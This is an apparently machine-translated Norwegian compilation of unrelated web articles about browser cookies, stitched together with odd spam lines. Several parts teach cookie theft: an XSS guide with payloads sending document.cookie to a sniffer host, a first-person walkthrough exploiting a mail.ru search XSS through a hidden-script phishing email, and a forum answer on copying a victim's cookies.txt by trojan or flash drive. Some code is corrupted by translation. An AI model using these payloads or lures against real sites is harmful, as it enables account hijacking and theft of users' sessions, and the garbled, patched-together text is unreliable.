En venn av meg har glemt passordet til en side. Imidlertid hadde han tidligere merket av for "Husk meg" i Google Chrome-nettleseren når han logget på, noe som ga ham tilgang til nettstedet under kontoen sin. Jeg fikk et spørsmål om det er mulig å overføre denne magiske tilstanden til en annen datamaskin. Det hadde selvfølgelig vært riktigere å endre eller gjenopprette passordet, men vennen min kunne ikke gjøre dette av årsaker som ikke var relatert til saken.

Hvordan bruke intercepter-ng for dummies

Til tross for variasjonen av moderne programvare å velge mellom, er det vanskelig å finne bedre hackingprogrammer for Android enn intercepter ng. Det første kriteriet som indikerer til fordel for dette produktet er dets faktiske ytelse. De fleste av snifferne som tilbys på nettverket er bare imitasjoner som ikke utfører de angitte funksjonene.

De neste positive faktorene er allsidigheten til applikasjonen og dekningen av et bredt publikum av brukere.

Datahjelp 939-29-71

La oss starte i rekkefølge. Informasjonskapsler eller «cookies» er svært små tekstfiler – bokmerker med informasjon.

Nettserveren overfører denne informasjonen til brukerens nettleser. hvor denne informasjonen lagres inntil nødvendig. Ikke helt klart. Vi vil. Fint.

Jeg skal prøve å gjøre det enda enklere. Se. du har registrert deg på et hvilket som helst nettsted.

På registreringstidspunktet opprettes de samme "informasjonskapslene".

Det er det de er.

Cookie Cadger

Programmet lytter til trafikk på WiFi-nettverket, fanger opp informasjonskapsler og replikerer brukerens økt i nettleseren din, og gjentar forespørsler med legitimasjonen hans. Forfatteren Matthew Sullivan holdt en presentasjon av programmet 30. september på Derbycons hackerkonferanse. Rett under talen avlyttet Matthew Sullivan en usikret sesjon med Google til en av konferansebesøkerne via WiFi.

Hvordan stjele informasjonskapsler

Hvis du, mens du er på en nettside, skriver inn følgende tekst i adressefeltet til Firefox- eller Opera-nettleseren din: javaсript:document.write(document.cookie); da vil du se noe sånt som: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 OBS! .

Den komplette veiledningen til skripting på tvers av nettsteder

XSS er en type programvaresårbarhet som er hjemmehørende i nettapplikasjoner som lar en angriper injisere skript på klientsiden på nettsider som vises av andre brukere. Wikipedia definerer XSS som følger: "Cross-site scripting (XSS) er en type programvaresårbarhet som er innfødt. til Internett.

Forskjellen mellom informasjonskapsler og økter

For ikke lenge siden skrev jeg en artikkel om hvordan man registrerer og autoriserer brukere på et nettsted.

". I denne artikkelen skal jeg bryte ned forskjellen mellom økter og informasjonskapsler. slik at du endelig kan ta ditt valg.

Informasjonskapsler. Nei, det handler ikke om informasjonskapsler i det hele tatt, det handler om din sikkerhet. Så du går til favorittsiden din "vkontakte" (eller ser for eksempel på e-post) på en annens datamaskin, nekter alternativet "lagre passord", ser glad gjennom e-posten og drar. Og ikke tenk på det faktum at du nå kan logge på et sosialt nettverk eller e-post under navnet ditt.

Jeg vurderer ikke engang situasjonen med et program som husker passordet uten at du vet det. Dette er allerede et bevisst hack, og du vil sannsynligvis mistenke at noe slikt kan skje, og du vil ikke gå til favorittsiden din på en slik datamaskin. Men vi kan snakke om enkel menneskelig nysgjerrighet - du var på besøk hos venner, og så får de plutselig muligheten til å lese posten din. Er du sikker på at de vil avslå denne muligheten? Er du ikke redd for at det skal komme ut noe? Uansett vil jeg legge til side spørsmål om moral og bare snakke om hvordan informasjon lagres på datamaskinen som du nå kan slippe inn på et nettsted uten å be om passord.

hvordan stjele Cookie

Og navnet på denne teknologien er informasjonskapsler.

Og det var her det hele startet. http-protokollen, som du faktisk ser på nettsteder (inkludert denne), ga i utgangspunktet ikke muligheten for å opprettholde en tilkobling. Det vil si at du grovt sett sender en forespørsel til siden, får svar, den vises på skjermen, og så husker ikke serveren noe om deg. Dette er selvfølgelig bra når nettstedet er rent informasjonsrikt og ikke skal huske noe om deg, men vi lever i Web 2.0-tiden 😉 Den naturlige utviklingen av protokollen er POST og GET-forespørsler, når du sender noen data, server kan skrive det til databasedata, men dette er ikke nok.

La oss se på et veldig enkelt eksempel. Forum. Så du registrerte deg, og det er et innlegg på forumet om at det er en sånn og en bruker med sånn og sånn passord og noen andre tilleggsdata. Men nå går du til forumet og logger inn - skriv inn passordet ditt. Et sted skal det være informasjon om at du er pålogget. På server? Selvfølgelig ikke! Det er umulig å lagre informasjon på serveren om at autorisasjonen ble gjort fra datamaskinen din - den vil ikke kunne skille deg fra noen andre (selv din IP-adresse identifiserer deg ikke entydig)! Derfor må informasjon om at autorisasjon har funnet sted lagres på datamaskinen din. Det er det informasjonskapsler er for, det er det de er laget for.

En informasjonskapsel er en liten post på datamaskinen din som lagrer informasjon om nettstedet du har besøkt. Når du logger inn, opprettes en lignende oppføring, hvoretter du kan gå rundt på forumet, og den vil kjenne deg igjen. Dette vil imidlertid allerede skje automatisk - takket være informasjonen som er lagret i informasjonskapselen - så å late som om du er hovedadministratoren for forumet vil fortsatt ikke fungere utenom passordkontrollen.

Nå kan vi gå tilbake til hvor denne artikkelen begynte. Hvis du logget på et sted uten engang å lagre et passord, kan det hende at det ble opprettet en oppføring på datamaskinen som nå lar deg logge på denne ressursen under ditt navn uten autorisasjon. En slik oppføring i seg selv vil bli utdatert etter en tid, men du kan tvinge den til å bli slettet. Hver nettleser gjør dette annerledes, jeg vil vise deg hvordan dette kan gjøres i min favoritt Google Chrome. Åpne parametrene

Gå til "avansert"-fanen og finn "vis informasjonskapsler"-knappen

Nå kan du selvfølgelig slette alle informasjonskapsler, men dette kan opprøre datamaskineieren. Derfor kan du for eksempel i det øverste feltet skrive inn navnet på nettstedet du er interessert i

Da kan du slette bare informasjonskapslene knyttet til dette nettstedet. Du kan prøve den på min. Men hvis du logger inn på forumet mitt og deretter sletter informasjonskapslene dine, vil påloggingsinformasjonen bli glemt. Prøv det!

kommentarer drevet av

1. Hva er XSS?
En XSS-sårbarhet gjør at vilkårlig javascript-kode kan settes inn i brødteksten på en side. XSS-angrepet skiller seg fra andre (for eksempel SQL-injeksjon eller PHP-injeksjon) ved at det påvirker klienten, ikke serveren.

hvordan stjele informasjonskapsler

Med dens hjelp kan du ikke se databasetabeller, laste inn et skall osv. Den vanligste bruken av XSS er å stjele informasjonskapsler.
Informasjonskapsler er et lite stykke data som opprettes av en webserver og lagres på brukerens datamaskin som en fil. Vanligvis brukes informasjonskapsler til å lagre kontoer, og som oftest inneholder de et kryptert passord, pålogging og økt-ID (men ikke alltid)
XSS kommer i to typer, aktiv og passiv.

Passiv XSS krever direkte deltakelse fra offeret, for eksempel å klikke på en lenke som inneholder javascript-kode. Når du bruker denne typen XSS, kan du ikke klare deg uten SI (Social Engineering)

Aktiv XSS krever ingen deltakelse fra offeret. Alt de trenger å gjøre er å besøke siden som inneholder XSS. Aktiv XSS kan for eksempel være i meldinger på forum, chatter, legge til nyheter osv.

2.Søk etter XSS
I dette avsnittet vil jeg fortelle deg hvordan du finner xss

2.1.Passiv XSS
For å finne passiv XSS, bare bytt inn alert('xss') i inndataskjemaet, hvis skriptet fungerte og meldingen "xss" vises, så er sårbarheten til stede, hvis skriptet ikke fungerte, kan du også prøve ">alert (), dette er sannsynligvis den vanligste xss-sårbarheten. Hvis verken det ene eller det andre skriptet fungerte, er det mest sannsynlig ingen sårbarhet.
La oss se på et eksempel.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Ser du "søk"-skjemaet? sett inn ">alert()" der og klikk "finn"
Et vindu med xss vises, noe som betyr at xss er til stede (kanskje når du leser denne artikkelen, vil denne xss allerede ha blitt fjernet).

2.2.Aktiv XSS
Slik css kan for eksempel være i profilfelt, når du legger til nyheter i tittelen på nyheten og i selve nyhetene (sjeldnere), i meldinger på forum/chatterom/gjesterom med html aktivert. Alt er enkelt her, vi legger inn skriptet fra forrige underavsnitt i feltene, og hvis meldingen vises på skjermen, er sårbarheten til stede.
La oss se på xss i BB-tagger på forumene.
Du kan prøve å sette inn javascript-kode i taggen, for eksempel slik:
javascript:alert('xss')
Noen tagger har parametere, for eksempel en tag har dynsrc og lowsrc parametere, la oss prøve å erstatte koden slik:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Hvis skriptet fungerte, er xss der

3. Bruke XSS til å stjele informasjonskapsler
Nå den deiligste))))
For å stjele informasjonskapsler trenger vi en nettsniffer, du kan installere en slags sniffer på hostingen din, eller du kan bruke en nettsniffer, som det er mange av nå.
For å stjele informasjonskapsler via passiv XSS, må offeret følge en giftig lenke. For å stjele informasjonskapsler bruker vi et annet skript i stedet for alert('xss'):
img = nytt bilde();


vi erstatter skriptet i lenken og lar offeret følge det, ser på snifferloggen og gleder oss.
La oss se på et eksempel.
La oss ta XSS på Rambler fra forrige avsnitt.
Vi setter inn
">
img = nytt bilde();
img.src = "snifferbildeadresse"+dokument.informasjonskapsel;

i søkeskjemaet, klikk "finn", se på adressefeltet og se:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Vi sender denne lenken til offeret og nyter informasjonskapslene.
Å se en slik kobling, kan offeret mistenke noe, så det er tilrådelig å kode
">img = nytt bilde();img.src = "snifferbildeadresse"+dokument.informasjonskapsel;
i URL Eller bruk tjenester som http://tinyurl.com/
La oss gå videre til aktiv XSS, alt er enkelt her, i stedet for alert() setter vi inn img = new Image();img.src = "adressen til snifferbildet"+document.cookie;

Nå har vi cookies. Men hva skal man gjøre med dem? Det er enkelt, du må erstatte dem i stedet for dine egne. Opera-nettleseren har en innebygd cookie-editor (verktøy->avansert->informasjonskapselhåndtering), det er en plugin for Firefox (jeg husker ikke hva den heter, bruk Google)
Det var alt for nå, kanskje artikkelen blir supplert

Der det ble foreslått å delta på et gratis arrangement dedikert til informasjonssikkerhetsspørsmål. Siden arrangementet ble holdt i byen min, bestemte jeg meg for at jeg definitivt måtte dra dit. Den første leksjonen ble viet sårbarheter på nettsteder som XSS. Etter leksjonen bestemte jeg meg for at jeg trengte å konsolidere den ervervede kunnskapen under reelle forhold. Jeg valgte flere nettsteder som er relatert til byen min og begynte å prøve å sette inn skriptet mitt i alle former. I de fleste tilfeller ble skriptet filtrert ut. Men det hendte at "varselet" ble utløst og meldingen min dukket opp. Jeg rapporterte den funnet sårbarheten til administratorene, og de fikset alt raskt.

På en av disse dagene, mens jeg sjekket den siste e-posten på mail.ru, fanget jeg et skjema for å søke etter bokstaver i postkassen. Av og til brukte jeg dette søket for å finne noe jeg trengte i en haug med de gamle brevene mine. Vel, siden jeg de siste par dagene har satt inn "varslingen" min nesten overalt hvor jeg kunne, strakk hånden min refleksivt etter dette søkeskjemaet. Jeg skrev inn koden for skriptet mitt og trykket på Enter. Se for deg overraskelsen min da jeg så en smertelig kjent melding på skjermen...


På Open InfoSec Days-forelesningen sa foredragsholderen at programmerere er ganske skeptiske til sårbarheter av denne typen, og sa "alarm? Vel, hva så? Dette er ikke farlig». Hvis jeg på andre nettsteder var fornøyd med bare dette vinduet med meldingen min, bestemte jeg meg i dette tilfellet for å gå videre og vise hva som kan komme ut av et slikt "varsel".

Så, skriptet fungerer, noe som betyr at det er en sårbarhet. Derfor kan du prøve å kjøre et annet skript. For eksempel et skript som sender en annen brukers informasjonskapsler til oss. For at skriptet skal fungere, må vi tvinge brukeren til å kjøre skriptet vårt. Dette kan gjøres ved å sende ham et brev med den aktuelle lenken, etter å ha klikket på som postkassen vil bli søkt og koden vi trenger vil bli utført.

Det tok litt tid og mye eksperimentering å forstå mekanikken bak sårbarheten. Noen ganger fungerte manuset, noen ganger ble det filtrert ut. Etter litt innsats ble det empirisk fastslått at manuset fungerer 100 % bare hvis søket etter bokstaver gir et positivt resultat. Det vil si at når en bruker utfører et søk med skriptet vårt, er det nødvendig at minst ett brev i postkassen hans blir funnet i henhold til de angitte parameterne. Det er ikke vanskelig å ordne dette.

I stedet for et "varsel", trenger vi også et skript som overfører informasjonskapsler til snifferen vår. Vi vil skrive dette skriptet i en egen fil og laste det inn i søket vårt. Jeg opprettet en test.js-fil med den nødvendige koden og lastet den opp til hostingen. Skriptkoden er slik:

Img=nytt bilde();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
funksjon F() (
location="http://www.solife.ru";
}
setTimeout(F, 5000);

Hva jeg ønsker å avklare her. La oss sette oss i stedet for angriperen. Vi trenger at brukeren klikker på lenken. Hvordan kan jeg tvinge ham til dette? Du kan love fjell av gull og for å motta dem må du følge lenken vår til siden. Men jeg tror ikke det vil fungere. Folk faller ikke for dette lenger (selv sletter jeg stadig slike brev uten engang å lese dem). Derfor vil vi spille på menneskelig medlidenhet, siden den fortsatt eksisterer i naturen. Vi ber deg stemme på siden for å redde truede dyr. Først tar vi informasjonskapslene, og deretter omdirigerer vi brukeren til stemmesiden. Tidsavbruddet for omdirigering ble satt til 5 sekunder, ellers hadde informasjonskapslene rett og slett ikke tid til å overføres til snifferen, og brukeren ble umiddelbart omdirigert til et nettsted om dyr. I stedet for et "varsel" brukte jeg følgende skript:

Da jeg var ferdig med manusene, begynte jeg å skrive brevet. Jeg kom på noe sånt som dette:


Det viste seg ganske kynisk, men jeg prøvde å bringe forholdene så nær virkeligheten som mulig. På slutten av brevet er det en linje med manus, dette er for at brevet vårt skal bli funnet når vi gjør et søk. For at streken ikke skal reise unødvendige spørsmål, malte jeg den hvit. Jeg la også et mellomrom i ordet "http" slik at strengen ikke ble gjenkjent og konvertert til en lenke. Ellers, til tross for at skriptlinjen er skrevet med hvit skrift, vil lenken bli uthevet i blått av mottakeren, og vi trenger ikke dette. Smartsøk vil fortsatt finne og gjenkjenne denne strengen, til tross for mellomrom.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Jeg brukte URL-koding for skriptet slik at ingenting ble filtrert ut. Jeg la også til parameteren "q_folder=0" for søk, slik at søket skjer i "Innboks"-mappen.

Brevet er klart, vi sender det. Jeg brukte min andre postkasse på samme tjeneste som mottakeren. La oss se hva som kom til den andre boksen.

Skriptteksten vår er ikke synlig fordi den smelter inn i bakgrunnen. La oss klikke på linken og se hva som skjer. Brukeren flyttes til søkeresultatene for e-poster basert på parameteren vi spesifiserte. Brevet vårt som vi sendte er synlig i søkeresultatene. På dette tidspunktet har skriptet vårt allerede fungert og sendt brukerens informasjonskapsler til snifferen. Etter 5 sekunder (tiden avhenger av skriptinnstillingene) blir brukeren omdirigert til avstemningssiden.

Jeg sjekker min sniff.txt-fil:

Siden målet mitt ikke er å stjele andres esker eller få tilgang til dem, avslutter jeg historien her. Men teoretisk sett kan du erstatte informasjonskapslene dine med andres og få tilgang til andres postboks. Generelt, hvis en angriper er interessert i et mål, vil han finne en bruk for informasjonen som mottas.

Jeg vil gjerne takke Sergei Belov (

Informasjonskapsler er en teknologi som lar et nettsted "huske" en bruker,
lagre innstillingene hans og ikke be ham om pålogging og passord hver gang. Kan
tror at hvis du sletter informasjonskapsler i nettleseren din, vil nettstedet ikke gjenkjenne deg. Men denne
Selvtillit er villedende.

Du kan bekymre deg for anonymiteten din så mye du vil, bruk en proxy
og VPN, forfalske HTTP-forespørselshoder som avslører systemet som brukes,
nettleserversjon, tidssone og mye annen informasjon, men nettstedet bryr seg ikke
Det vil fortsatt være måter å gjenkjenne det faktum at du allerede har vært der. I mange
i tilfeller er dette ikke spesielt kritisk, men ikke i en situasjon hvor noen
tjeneste du trenger for å presentere deg selv som en annen bruker eller bare lagre
anonymitet. Det er lett å forestille seg hvordan anti-svindel systemet av en slags konvensjonell
finansorganisasjon, hvis den fastslår at transaksjoner ble utført fra én datamaskin
autorisasjon under kontoene til helt andre personer. Og er det ikke fint?
innse at noen på Internett kan spore bevegelsene dine? Neppe. Men
første ting først.

Hvordan fungerer informasjonskapsler?

Informasjonskapsler har blitt brukt i århundrer for å identifisere brukere.
Informasjonskapsler (fra engelsk "cookies") er en liten del av tekstinformasjon,
som serveren sender til nettleseren. Når en bruker får tilgang til serveren
(skriver inn adressen i nettleserlinjen), kan serveren lese informasjonen,
som finnes i informasjonskapsler, og basert på analysen, utføre eventuelle handlinger.
For eksempel ved autorisert tilgang til noe via nettet i informasjonskapsler
pålogging og passord lagres under økten, noe som lar brukeren ikke
skriv dem inn igjen når du blir bedt om for hvert passordbeskyttede dokument. Så
På denne måten kan nettsiden "huske" brukeren. Teknisk ser det ut som
på følgende måte. Når du ber om en side, sender nettleseren en kort melding til webserveren.
HTTP-forespørselstekst.

For eksempel for å få tilgang til siden www.example.org/index.html nettleseren
sender følgende forespørsel til www.example.org-serveren:

FÅ /index.html HTTP/1.1
Vert: www.example.org

Serveren svarer ved å sende den forespurte siden sammen med teksten,
som inneholder HTTP-svaret. Dette kan instruere nettleseren til å lagre informasjonskapsler:

HTTP/1.1 200 OK
Innholdstype: tekst/html
Set-Cookie: navn=verdi

Hvis det er en Set-cookie-linje, husker nettleseren linjen navn=verdi (navn =
verdi) og sender den tilbake til serveren med hver påfølgende forespørsel:

FÅ /spec.html HTTP/1.1
Vert: www.example.org
Informasjonskapsel: navn=verdi
Aksepterer: */*

Alt er veldig enkelt. Hvis serveren mottok informasjonskapsler fra klienten og den har dem inne
database, kan han definitivt behandle dem. Altså, hvis det var cookies med
brukeren vil ikke ha noe informasjon om autorisasjon på tidspunktet for besøket
du vil bli bedt om pålogging og passord. I følge standarden har informasjonskapsler en viss levetid
(selv om den kan være veldig stor), hvoretter de dør. Og hvilken som helst
brukeren kan enkelt slette lagrede informasjonskapsler ved å bruke
det tilsvarende alternativet, som er tilgjengelig i alle nettlesere. Dette faktum er veldig
opprører eierne av mange ressurser som ikke ønsker å miste kontakten med
besøkende. Det er viktig for dem å spore ham, for å forstå at «denne personen var med oss
i går, og i forgårs osv." Dette gjelder spesielt for ulike analysatorer
trafikk, systemer for vedlikehold av statistikk, bannernettverk m.m. Dette er hvor
moroa begynner, fordi utviklere bruker alle slags
triks som mange brukere ikke en gang er klar over. De er på farten
ulike triks.

Flash-informasjonskapsler

Saken er at i tillegg til de vanlige HTTP "godbitene", som alle lenge har vært interessert i
ble vant til det, nå brukes alternative lagringsplasser aktivt, hvor nettleseren
kan skrive data på klientsiden. Det første å nevne er
lagring av det du elsker og hater på samme tid Flash (for de brukerne som
som den er installert). Data lagres i såkalt LSO (Local Shared
Objekter) - filer som ligner i formatet informasjonskapsler som er lagret lokalt på
brukerens datamaskin. Tilnærmingen ligner på mange måter konvensjonelle "godbiter" (i dette
et lite beløp lagres også på brukerens datamaskin.
tekstdata), men har noen fordeler:

  • Flash-informasjonskapsler er felles for alle nettlesere på en datamaskin (i motsetning til
    fra den klassiske informasjonskapselen, som er knyttet til nettleseren). Innstillinger, informasjon
    om økten, som for eksempel en identifikator for å spore brukeren,
    er ikke knyttet til noen spesifikk nettleser, men blir vanlig for
    alle.
  • Flash-informasjonskapsler lar deg lagre mye mer data (som
    vanligvis 100 KB), noe som øker antall brukerinnstillinger,
    tilgjengelig for lagring.

I praksis blir LSO en veldig enkel og rimelig sporingsteknologi
bruker. Tenk på det: hvis jeg foreslo at du fjerner alle "godbitene" i
system, vil du huske Flash-informasjonskapsler? Sannsynligvis ikke. Prøv nå å ta
alle seere, for eksempel gratis

FlashCookiesSe og se hvor mange interessante ting som er registrert i
Flash-lager. En liste over nettsteder som virkelig ikke vil
mister sporet ditt, selv om du tømmer nettleserbufferen (sammen med godbitene).

Informasjonskapsler overalt med evercookie

Men hvis avanserte brukere og enda mer eller mindre gode brukere har hørt om LSO
utviklere, da om eksistensen av andre datalagringsteknikker, noen ganger veldig
sofistikert (men effektivt), mange mistenker ikke engang. Ta i det minste nye
depoter som dukket opp i
(Session Storage,
Local Storage, Global Storage, Database Storage via SQLite), som du kan
les i artikkelen "". En polsk spesialist ble alvorlig forvirret av dette problemet
om sikkerhet Samy Kamkar. Som et resultat, en spesiell
Evercookie JavaScript-bibliotek, som er spesielt utviklet for å
lage de mest holdbare informasjonskapslene i nettleseren. Noen kan spørre: "Hvorfor
er dette nødvendig?" Veldig enkelt: for å identifisere unikt
sidebesøkende hvis han kommer igjen. Slike vanskelige å drepe informasjonskapsler er ofte
kalles sporingsinformasjonskapsler og blir til og med oppdaget av noen antivirus som
trussel mot personvernet. Evercookie kan redusere alle forsøk på å forbli anonym til
null.

Hemmeligheten er at evercookie bruker alt tilgjengelig for nettleseren på en gang
lagring: vanlige HTTP-informasjonskapsler, LSO, HTML5-beholdere. I tillegg spiller det inn
flere utspekulerte triks som, med ikke mindre suksess, lar deg dra
datamaskin ønsket merke. Blant dem: generering av spesielle PNG-bilder,
ved hjelp av historieleser, lagring av data ved hjelp av ETag tag, container
userData i Internet Explorer - det viser seg at det er mange alternativer.

Du kan se hvor effektivt dette fungerer på nettsiden.
utvikler -
http://samy.pl/evercookie. Hvis du klikker på "Klikk for å opprette en
evercookie", vil informasjonskapsler med et tilfeldig tall bli opprettet i nettleseren. Prøv det
slette informasjonskapsler der det er mulig. Jeg vedder nå på deg
Jeg tenkte: "Hvor ellers kan jeg slette informasjonskapsler, bortsett fra i nettleserinnstillingene?"
Er du sikker på at du har slettet alt? Last inn siden på nytt for å være sikker, du kan til og med gjøre det igjen
åpne nettleseren. Nå kan du gjerne klikke på knappen "Klikk for å gjenoppdage informasjonskapsler".
WTF? Dette hindret ikke nettstedet fra å ta data fra et sted - i sidefeltene
nummeret som ble lagret i informasjonskapsler ble vist. Men gned vi dem? Hvordan
virket det? La oss prøve å forstå noen teknikker.

Informasjonskapsler i PNG

En ekstremt interessant teknikk som brukes i Evercookie er tilnærmingen
lagring av data i bufrede PNG-bilder. Når evercookie setter
informasjonskapsler, får den tilgang til evercookie_png.php-skriptet med en spesiell HTTP "bun",
forskjellig fra det som brukes til å lagre standardinformasjon om
økter. Disse spesielle informasjonskapslene leses av et PHP-skript som lager
Et PNG-bilde der alle RGB (farge) verdier er satt i henhold til
med informasjon om økten. Til syvende og sist sendes PNG-filen til klientens nettleser
med merknaden: "filen må bufres i 20 år."

Etter å ha mottatt disse dataene, sletter evercookie den tidligere opprettede spesialen
HTTP-informasjonskapsler, sender deretter samme forespørsel til det samme PHP-skriptet, men ikke
gi informasjon om brukeren. Han ser at dataene han er interessert i
nei, og den kan ikke generere en PNG. I stedet kommer nettleseren tilbake
falsk HTTP-svar "304 Not Modified" som får den til å trekke filen fra
lokal cache. Bildet fra cachen settes inn på siden ved hjelp av taggen
HTML5 Canvas. Når dette skjer, leser evercookie hver piksel
Lerretsinnhold, trekke ut RGB-verdiene og dermed gjenopprette
de originale informasjonskapseldataene som ble lagret i bildet. Voila, det er det
virker.

Hint med netthistorikk

En annen teknikk bruker nettleserhistorikken direkte. Når nettleseren
installerer bollen, evercookie koder dataene ved hjelp av Base64-algoritmen,
som må bevares. La oss anta at disse dataene er en streng,
den resulterende "bcde" etter konvertering til Base64. Bibliotek sekvensielt
får tilgang til følgende nettadresser i bakgrunnen:

google.com/evercookie/cache/b
google.com/evercookie/cache/bc
google.com/evercookie/cache/bcd
google.com/evercookie/cache/bcde
google.com/evercookie/cache/bcde-

Så disse nettadressene lagres i historien. Deretter kommer en spesiell
teknikk - CSS History Knocker, som ved hjelp av et JS-skript og CSS tillater
sjekk om brukeren besøkte den angitte ressursen eller ikke (mer detaljer her -
samy.pl/csshack). Til
evercookie bun-sjekker går gjennom alle mulige Base64-tegn på
google.com/evercookie/cache, starter med tegnet "a" og går fremover, men bare
for en karakter. Når skriptet ser URL-en som ble åpnet, vil det
begynner å søke etter neste tegn. Det viser seg å være en slags råstyrke. I praksis
dette valget utføres ekstremt raskt, fordi det ikke er noen forespørsler til
serveren er ikke utført. Søk i historie foretas så mye som mulig lokalt
kortsiktig. Biblioteket vet at det har nådd slutten av linjen når URL-en er
avsluttes med symbolet "-". Vi dekoder Base64 og får dataene våre. Hvordan
navn på nettleserutviklere som tillater dette?

Prøv å slette

Hva skjer hvis brukeren gnir informasjonskapslene sine? En viktig funksjon ved selve biblioteket
evercookie er at brukeren må prøve hardt for å
slett informasjonskapsler på forskjellige steder - nå er det 10 av dem på minst én
Hvis informasjonskapseldataene forblir på plass, vil de automatisk bli gjenopprettet i alle andre
steder. For eksempel hvis brukeren ikke bare sletter sine standard informasjonskapsler, men
og slett LSO-data, ryd opp i HTML5-lagringer, noe som allerede er usannsynlig uansett
Informasjonskapslene som er opprettet ved hjelp av den bufrede PNG-en og netthistorikken, vil forbli. På
neste gang du besøker et nettsted med evercookie, vil ikke biblioteket bare kunne finne
skjult bolle, men vil også gjenopprette dem på alle andre steder som
støtter klientnettleser. Et interessant poeng er knyttet til overføringen
"godbiter" mellom nettlesere. Hvis brukeren mottar informasjonskapsler i én nettleser,
det vil si at det er stor sannsynlighet for at de blir reprodusert i andre. Den eneste tingen
en nødvendig betingelse for dette er å lagre dataene i en Local Shared Object-informasjonskapsel.

Hvordan å bruke?

Evercookie-biblioteket er helt åpent, så du kan fritt
bruk den og tilpass den til dine behov. Serveren er ikke presentert med noen
seriøse krav. Alt du trenger er tilgang til et JS-skript der
inneholder evercookie-koden. For å bruke Flash-informasjonskapsler (Local Shared Object),
det må være en fil evercookie.swf i mappen med skriptet, og for at teknikeren skal fungere,
basert på PNG-caching og bruk av ETag-lagring, tilgang til
PHP-skript evercookie_png.php og evercookie_etag.php. Bruk evercookie
Du kan gjøre dette på hvilken som helst side på nettstedet ved å koble til følgende skript:





var ec = new evercookie();
// sett informasjonskapselen "id" med verdien "12345"
// syntaks: ec.set(nøkkel, verdi)
ec.set("id", "12345");
// gjenopprett informasjonskapselen med navnet "id"
ec.get("id", funksjon(verdi)
{
alert("Cookie-verdi er " + verdi)
});

Det er også en annen måte å få informasjonskapsler på, basert på bruk av flere
avansert tilbakeringingsfunksjon. Dette lar deg trekke ut informasjonskapselverdier fra
forskjellige lagringsplasser som brukes og sammenligne dem med hverandre:

funksjon getCookie(beste_kandidat, alle_kandidater)
{
alert("Den hentede informasjonskapselen er: " + best_candidate + "\n" + "Du
kan se hva hver lagringsmekanisme returnerte " + "ved å gå gjennom alle
kandidatene protesterer.");

For (var element i all_candidates) document.write("Storage
mekanisme " + element + " returnerte: " + alle_kandidater + "
");
}

ec.get("id", getCookie);

Evercookie-biblioteket er tilgjengelig for alle. Det er litt skummelt, spesielt hvis
Du har absolutt ingen anelse om hva du kan gjøre mot henne.

Hvordan beskytte deg selv?

Det er ingen problemer med å slette informasjonskapsler i nettleseren og Flash Men prøv
slett dataene uansett hvor cookie har blitt etterlatt! Tross alt, hvis du lar informasjonskapslene i ett
plass - skriptet vil automatisk gjenopprette verdien i alle andre
lagre. I hovedsak er dette biblioteket en god modussjekker
personvern, som nesten alle nettlesere nå har. Og det er det jeg forteller deg
Jeg vil si: fra Google Chrome, Opera, Internet Explorer og Safari, bare den siste
"Privat surfing"-modus blokkerte alle metodene som ble brukt
evercookie. Det vil si at etter å ha lukket og åpnet nettleseren, kunne ikke skriptet
gjenopprette verdien den har igjen. Det er grunn til å tenke. Dessuten, i
i nær fremtid lovet utvikleren evercookie å legge til mer til biblioteket
flere datalagringsteknikker, inkludert bruk av isolert teknologi
Lagring i Silverlight, samt en Java-applet.

Til spørsmålet Hvordan få COOKIES cookies. Jeg trenger informasjonskapsler, hvordan kan jeg få tak i dem, vennligst fortell meg!!! 1 spurt av Vlad eeEEeeeeeeeeee det beste svaret er Hva er informasjonskapsler?
Faktum er at i prosessen med å utvikle www-teknologier og introdusere programmeringsspråk til Internett, sto programutviklere overfor et veldig alvorlig problem - hvordan lagre resultatene av algoritmen for hver spesifikk bruker i lang tid? HTTP-protokollen i seg selv har ikke muligheten til å registrere resultatene av programvareprosesser. Å bruke økter er heller ikke en løsning på problemet, siden effekten deres slutter umiddelbart etter at forbindelsen til serveren er brutt.
Problemet ble løst med introduksjonen av informasjonskapselmekanismen (det vil si oversatt fra engelsk som "informasjonskapsler"). Informasjonskapsler har en bemerkelsesverdig egenskap - de lagres på brukerens harddisk og kan lagres der i nesten ubegrenset tid.
I kjernen er informasjonskapsler vanlige tekstfiler lagret i en spesiell katalog som brukes av nettleseren (vanligvis kalles denne mappen Temporary Internet Files), og du kan se dem ved å gå til denne katalogen (rask tilgang for IE-nettleseren er gjennom verktøyene menyelementer -> Internett-alternativer -> Midlertidige Internett-filer -> Innstillinger -> Visning
Noen verdier for informasjonskapsler kan bare lagres i én økt og slettes når nettleseren lukkes. Andre, satt for en periode, skrives til en fil. Generelt kalles denne filen "cookies.txt" (men det kan være flere av dem) og ligger i arbeidskatalogen til nettleseren som er installert på datamaskinen.
med andre ord
En informasjonskapsel er et lite stykke tekstinformasjon som serveren sender til nettleseren. Informasjonskapsler i seg selv kan ikke gjøre noe, men når en bruker kontakter serveren (skriver inn adressen i nettleserlinjen), kan serveren lese informasjonen i informasjonskapslene og, basert på analysen, utføre eventuelle handlinger. For eksempel, ved autorisert tilgang til noe via Internett, lagres innlogging og passord i informasjonskapsler under økten, som gjør at brukeren ikke kan legge dem inn igjen når de ber om hvert passordbeskyttet dokument.
Hvis du prøver å få tilgang gjennom dette emnet til andres passordbeskyttede kontoer, må du finne en måte eksternt (trojansk) eller ved åpenlyst å kopiere den til en flash-stasjon, hvis du har tilgang til datamaskinen der offeret jobber , kopier denne filen cookies.txt og erstatt den i din (samme) nettleseren din på den. Deretter går du til ønsket side hvor kontoen du er interessert i ligger, og du får automatisk tilgang. Men husk at hvis offeret klikker på logg ut av kontoen (for eksempel fra e-post) når du er ferdig med arbeidet, vil informasjonen om økten bli slettet i informasjonskapslene, og du vil ikke få noen tilgang.
Mozilla Firefox lagrer informasjonskapsler i brukerprofilen, i filen C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfilescookies.txt
